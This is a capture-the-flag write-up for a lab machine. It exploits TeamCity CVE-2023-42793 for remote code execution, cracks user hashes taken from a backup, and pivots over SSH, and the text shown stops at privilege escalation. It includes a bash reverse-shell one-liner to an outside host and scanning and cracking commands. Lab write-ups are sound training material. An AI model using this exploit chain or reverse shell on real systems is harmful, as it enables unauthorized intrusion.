This is an Ubuntu 22.04 machine hosting a vulnerable version of TeamCity (CVE-2023-42793) which can be exploited to get a foothold into the system. Then, we locate private keys and usernames stored in the file system and move laterally to users with privileges to read the user flag. Regarding privilege escalation, a Portainer application running as root is abused.
KEYWORDS
TeamCity, CVE-2023-42793, port forwarding, Portainer.
> nmap $target -p- --min-rate=5000 -Pn --open --reason
Starting Nmap 7.93 ( https://nmap.org ) at 2024-04-20 15:31 EDT
Nmap scan report for 10.10.11.13
Host is up, received user-set (0.078s latency).
Not shown: 64465 closed tcp ports (conn-refused), 1067 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack
80/tcp open http syn-ack
8000/tcp open http-alt syn-ack
Nmap done: 1 IP address (1 host up) scanned in 14.57 seconds
Enumerate the open ports.
> nmap $target -p22,80,8000 -sV -sC -Pn -vv -n
Starting Nmap 7.93 ( https://nmap.org ) at 2024-04-20 15:31 EDT
Nmap scan report for 10.10.11.13
Host is up, received user-set (0.072s latency).
Scanned at 2024-04-20 15:31:57 EDT for 12s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 3eea454bc5d16d6fe2d4d13b0a3da94f (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJ+m7rYl1vRtnm789pH3IRhxI4CNCANVj+N5kovboNzcw9vHsBwvPX3KYA3cxGbKiA0VqbKRpOHnpsMuHEXEVJc=
| 256 64cc75de4ae6a5b473eb3f1bcfb4e394 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOtuEdoYxTohG80Bo6YCqSzUY9+qbnAFnhsk4yAZNqhM
80/tcp open http syn-ack nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://runner.htb/
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.18.0 (Ubuntu)
8000/tcp open nagios-nsca syn-ack Nagios NSCA
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap done: 1 IP address (1 host up) scanned in 12.86 seconds
There are several POCs in GitHub but couldn't make any of them work, so I decided to exploit the application manually. This was also used as a reference: https://github.com/hotplugin0x01/CVE-2023-42793
First, delete any previous authentication token querying this endpoint /app/rest/users/<userLocator>/tokens/RPC2
Next step is to configure the debug API to enable admins to trigger configuration reloads, thus enabling arbitrary RCE. For this, use the previously obtained token.
Now you can issue commands. Insert the binary name in the exePath parameter, and the rest of arguments in as many params fields as you need. The following is an example issuing a reverse shell payload (/bin/bash –c bash -i >& /dev/tcp/10.10.xxx.xxx/1919 0>&1).
Nice to know but useless for the moment since we don't have an username, need to look further. Found several database backups here /data/teamcity_server/datadir/backup
And inside TeamCity_Backup_20240421_145357.zip, in the database_dump folder, we find a dump for the users table that contains hashes for users john@runner.htb and matthew@runner.htb
John's seems uncrackable, though the other one (Matthew's) is (Blowfish module).
> hashcat -m 3200 -a 0 -d 1 hash.txt .\rockyou.txt
Take note of this password, we will use it afterwards. Now that we have 2 usernames we can test the private key we found before. It works with username john and we are able to get an SSH shell in the host.
Which can be used to retrieve the user flag.
ROOT
Start from the SSH shell for user john and take the opportunity to enumerate the current user and the system.
> id && whoami
uid=1001(john) gid=1001(john) groups=1001(john)
> uname -a && cat /etc/os-release
Linux runner 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
PRETTY_NAME="Ubuntu 22.04.4 LTS"
NAME="Ubuntu"
VERSION_ID="22.04"
VERSION="22.04.4 LTS (Jammy Jellyfish)"
VERSION_CODENAME=jammy
ID=ubuntu
ID_LIKE=debian
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
UBUNTU_CODENAME=jammy
